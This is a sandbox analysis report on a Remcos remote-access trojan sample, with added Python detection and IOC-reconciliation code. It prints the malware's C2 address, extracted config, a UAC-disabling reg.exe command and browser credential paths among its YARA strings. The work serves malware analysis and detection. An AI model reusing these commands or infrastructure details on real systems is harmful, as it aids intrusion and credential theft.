
Windows Analysis Report
jv4ri.exe

Overview

General Information

Sample name: jv4ri.exe
Analysis ID: 1505824
MD5: b17e1003bb9bbe58e090c7752447c016
SHA1: a159b486e535469d4c49b227d27608f2ad48288e
SHA256: d24d76d03365122aa5a4a7828a2d14368066da840ae8945cf595a6b17ceca700
Tags: exe, remcos, rat

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
One or more processes crash
Potential key logger detected (key state polling based)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • jv4ri.exe (PID: 5832 cmdline: "C:\Users\user\Desktop\jv4ri.exe" MD5: B17E1003BB9BBE58E090C7752447C016)
    • name.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\jv4ri.exe" MD5: B17E1003BB9BBE58E090C7752447C016)
      • svchost.exe (PID: 4208 cmdline: "C:\Users\user\Desktop\jv4ri.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • name.exe (PID: 6364 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: B17E1003BB9BBE58E090C7752447C016)
        • svchost.exe (PID: 3712 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • WerFault.exe (PID: 4956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 7064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 784 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 6604 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 4160 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: B17E1003BB9BBE58E090C7752447C016)
      • svchost.exe (PID: 6548 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
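The tree above carries the two behaviours worth turning into detections. First, jv4ri.exe copies itself to AppData\Local\directory\name.exe and drops name.vbs into the user's Startup folder, so every logon runs wscript.exe on that script. Second, each name.exe instance starts C:\Windows\SysWOW64\svchost.exe and, per the injection signatures above (suspended-mode process creation, writes to foreign memory), replaces its image: the resulting svchost.exe keeps the loader's command line ("C:\Users\user\Desktop\jv4ri.exe") and has name.exe rather than services.exe as its parent. The following Python is an added example, not part of the Joe Sandbox report; it encodes those checks and runs them over process-creation events constructed from the PIDs and paths in this tree. The ProcEvent field layout and the two benign control events are assumptions.

```python
"""Detections for the process-tree anomalies in this report:
(1) a system-directory binary whose command line names a different executable
    (the footprint of process hollowing),
(2) svchost.exe with a parent other than services.exe,
(3) wscript/cscript executing a script that lives in a Startup folder.
Sample events are constructed from the report's process tree (an assumed shape)."""
import re
from dataclasses import dataclass

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\[^\"]+", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str  # "" when the parent is unknown, as for PID 6604 in the report


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def claimed_executable(cmdline: str) -> str:
    """Executable named by argv[0] of a command line, with quotes stripped."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def is_hollowed_system_binary(ev: ProcEvent) -> bool:
    """Image lives in a system directory but argv[0] names another binary.
    A loader that creates a system process suspended and swaps its image keeps
    the command line it passed, so Image=svchost.exe with CommandLine=jv4ri.exe
    is the tell."""
    if not ev.image.lower().startswith(SYSTEM_DIRS):
        return False
    return basename(claimed_executable(ev.cmdline)) != basename(ev.image)


def is_svchost_uncommon_parent(ev: ProcEvent) -> bool:
    """svchost.exe is normally spawned by services.exe; anything else is suspicious."""
    return basename(ev.image) == "svchost.exe" and basename(ev.parent_image) != "services.exe"


def is_startup_script_execution(ev: ProcEvent) -> bool:
    """wscript/cscript running a script that sits in a Startup folder."""
    if basename(ev.image) not in SCRIPT_HOSTS:
        return False
    m = STARTUP_RE.search(ev.cmdline)
    return bool(m) and m.group(0).lower().endswith(SCRIPT_EXTS)


RULES = {
    "hollowed_system_binary": is_hollowed_system_binary,
    "svchost_uncommon_parent": is_svchost_uncommon_parent,
    "startup_script_execution": is_startup_script_execution,
}


def triage(events):
    """Return {pid: [rule names]} for every event that trips at least one rule."""
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits[ev.pid] = fired
    return hits


# Constructed from the process tree in this report, plus two benign controls.
SAMPLE_EVENTS = [
    ProcEvent(4208, r"C:\Windows\SysWOW64\svchost.exe", r'"C:\Users\user\Desktop\jv4ri.exe"',
              6176, r"C:\Users\user\AppData\Local\directory\name.exe"),
    ProcEvent(6604, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"',
              1028, ""),
    ProcEvent(900, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p",
              700, r"C:\Windows\System32\services.exe"),
    ProcEvent(901, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Documents\report.vbs"',
              1028, r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

The hollowing check compares argv[0] against the image path rather than looking for a specific parent, so it also catches loaders that pick a parent other than name.exe; the Startup check keys on the folder rather than the file name, since name.vbs is arbitrary.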
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Malware configuration (extracted from memory):
{"Host:Port:Password": "5.95.169.104:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-S3AD48", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Note: the extractor reports the host as 5.95.169.104, while the Suricata alerts and the Networking section of this report show the C2 connections going to 45.95.169.104:2404 with no preceding DNS query. The observed destination is the network IOC to pivot on; the extracted string appears to be missing its leading digit.
YARA matches on dropped files (Source | Rule | Description | Author):
  • C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

YARA matches on memory dumps (Source | Rule | Description | Author):
  • 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
  • 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
  • 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
      - 0x6c4b8:$a1: Remcos restarted by watchdog!
      - 0x6ca30:$a3: %02i:%02i:%02i:%03i
  (49 further entries not shown)

YARA matches on unpacked PEs (Source | Rule | Description | Author):
  • 12.2.svchost.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
  • 12.2.svchost.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 12.2.svchost.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
  • 12.2.svchost.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
      - 0x6aab8:$a1: Remcos restarted by watchdog!
      - 0x6b030:$a3: %02i:%02i:%02i:%03i
  • 12.2.svchost.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
      - 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
      - 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      - 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      - 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      - 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      - 0x64b7c:$str_b2: Executing file:
      - 0x65bfc:$str_b3: GetDirectListeningPort
      - 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      - 0x65728:$str_b7: \update.vbs
      - 0x64ba4:$str_b9: Downloaded file:
      - 0x64b90:$str_b10: Downloading file:
      - 0x64c34:$str_b12: Failed to upload file:
      - 0x65bc4:$str_b13: StartForward
      - 0x65be4:$str_b14: StopForward
      - 0x65680:$str_b15: fso.DeleteFile "
      - 0x65614:$str_b16: On Error Resume Next
      - 0x656b0:$str_b17: fso.DeleteFolder "
      - 0x64c24:$str_b18: Uploaded file:
      - 0x64be4:$str_b19: Unable to delete:
      - 0x65648:$str_b20: while fso.FileExists("
      - 0x650c1:$str_c0: [Firefox StoredLogins not found]
  (55 further entries not shown)

                  System Summary

                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 6604, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\jv4ri.exe", CommandLine: "C:\Users\user\Desktop\jv4ri.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\jv4ri.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 6176, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\jv4ri.exe", ProcessId: 4208, ProcessName: svchost.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 6604, ProcessName: wscript.exe
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\jv4ri.exe", CommandLine: "C:\Users\user\Desktop\jv4ri.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\jv4ri.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 6176, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\jv4ri.exe", ProcessId: 4208, ProcessName: svchost.exe

                  Data Obfuscation

                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 6176, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                  Stealing of Sensitive Information

                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3712, TargetFilename: C:\ProgramData\remcos\logs.dat
Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol):
  • 2024-09-06T21:56:59.201852+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5:49704 | 45.95.169.104:2404 | TCP
  • 2024-09-06T21:57:23.529980+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5:49721 | 45.95.169.104:2404 | TCP
  • 2024-09-06T21:57:23.529980+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5:49722 | 45.95.169.104:2404 | TCP
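The alerts above, together with the extracted configuration earlier on this page, give two views of the C2 that do not agree: the config extractor reports 5.95.169.104:2404 (password "1"), while every alert records the sandbox host connecting to 45.95.169.104:2404, with no DNS query, so the extracted host string appears to be missing a leading digit. The following Python is an added example, not part of the Joe Sandbox report. It parses the extracted config, parses the alert rows (re-typed here as tab-separated text, a constructed layout), reconciles the two, and emits the IOC set. A configured host that is a proper suffix of an observed peer on the same port is flagged as a probable extraction truncation; that is a heuristic, reported rather than silently corrected. The "|" separator for multiple host entries is an assumption.

```python
"""Reconcile the Remcos config extracted from memory with the C2 traffic the
sandbox actually saw, and build an IOC set from both.  Config values and alert
rows are taken from this report; the tab-separated row layout is constructed."""
import ipaddress
import json

# Excerpt of the configuration the report's extractor recovered from memory.
EXTRACTED_CONFIG = {
    "Host:Port:Password": "5.95.169.104:2404:1",
    "Mutex": "Rmc-S3AD48",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
    "Copy file": "remcos.exe",
    "Keylog file": "logs.dat",
}

# The three Suricata alerts from this report as tab-separated rows (constructed
# layout: timestamp, sid, severity, classtype, src, sport, dst, dport, proto).
SURICATA_ROWS = (
    "2024-09-06T21:56:59.201852+0200\t2036594\t1\tMalware Command and Control Activity Detected\t192.168.2.5\t49704\t45.95.169.104\t2404\tTCP\n"
    "2024-09-06T21:57:23.529980+0200\t2036594\t1\tMalware Command and Control Activity Detected\t192.168.2.5\t49721\t45.95.169.104\t2404\tTCP\n"
    "2024-09-06T21:57:23.529980+0200\t2036594\t1\tMalware Command and Control Activity Detected\t192.168.2.5\t49722\t45.95.169.104\t2404\tTCP\n"
)


def parse_c2_entries(value):
    """Split the 'Host:Port:Password' field into one dict per C2 entry.
    Entries are host:port:password; '|' between several entries is an
    assumption, and bare IPv6 literals are not handled."""
    entries = []
    for triple in value.split("|"):
        host, port, password = triple.strip().rsplit(":", 2)
        entries.append({"host": host, "port": int(port), "password": password})
    return entries


def parse_suricata_rows(text):
    """Parse tab-separated alert rows into dicts with typed SIDs and ports."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sev, classtype, src, sport, dst, dport, proto = line.split("\t")
        rows.append({"ts": ts, "sid": int(sid), "severity": int(sev),
                     "classtype": classtype, "src": src, "sport": int(sport),
                     "dst": dst, "dport": int(dport), "proto": proto.lower()})
    return rows


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def reconcile(config, alert_text):
    """Compare configured C2 endpoints with observed peers and build the IOC set."""
    configured = parse_c2_entries(config["Host:Port:Password"])
    alerts = parse_suricata_rows(alert_text)
    observed = {(a["dst"], a["dport"], a["proto"]) for a in alerts}
    findings = []
    for c in configured:
        key = (c["host"], c["port"])
        same_port = [o for o in observed if o[1] == c["port"]]
        if any(o[0] == c["host"] for o in same_port):
            findings.append(("confirmed", key, None))
            continue
        # A configured host that is a proper suffix of an observed peer on the
        # same port is most likely a truncated extraction (5.95.169.104 versus
        # 45.95.169.104 here), not a second server.  Heuristic: report, don't fix.
        suffix = [o for o in same_port if o[0].endswith(c["host"]) and o[0] != c["host"]]
        if suffix:
            findings.append(("config_host_truncated", key, (suffix[0][0], suffix[0][1])))
        else:
            findings.append(("not_observed", key, None))
    iocs = {
        "network": sorted(f"{h}:{p}/{proto}" for h, p, proto in observed),
        "sids": sorted({a["sid"] for a in alerts}),
        "mutex": config.get("Mutex"),
        "copy_file": config.get("Copy file"),
        "keylog_file": config.get("Keylog file"),
        "run_keys": [k for k in ("Setup HKCU\\Run", "Setup HKLM\\Run") if config.get(k) == "Enable"],
        # An IP-literal C2 needs no DNS lookup, which matches the report's
        # "TCP traffic detected without corresponding DNS query" entries.
        "dns_expected": any(not is_ip(c["host"]) for c in configured),
    }
    return {"configured": configured, "findings": findings, "iocs": iocs}


if __name__ == "__main__":
    print(json.dumps(reconcile(EXTRACTED_CONFIG, SURICATA_ROWS), indent=2, default=str))
```

Keeping the mismatch as a finding rather than overwriting the config host matters when several samples are being bulk-processed: an extractor bug and a genuine second server look identical in the config alone, and only the packet data settles it.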


                  AV Detection

                  Source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "5.95.169.104:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-S3AD48", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: C:\Users\user\AppData\Local\directory\name.exeReversingLabs: Detection: 42%
                  Source: jv4ri.exeReversingLabs: Detection: 42%
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181376722.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\directory\name.exeJoe Sandbox ML: detected
                  Source: jv4ri.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_004338C8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_004338C8
                  Source: name.exe, 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_ef034609-8

                  Exploits

                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR

                  Privilege Escalation

                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407538 _wcslen,CoGetObject,5_2_00407538
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00407538 _wcslen,CoGetObject,12_2_00407538
                  Source: jv4ri.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2039035690.0000000004000000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2039157753.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2052777335.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2053042365.0000000003730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2179689028.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2180712436.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2039035690.0000000004000000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2039157753.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2052777335.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000003.2053042365.0000000003730000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2179689028.0000000003740000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.2180712436.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CD4696
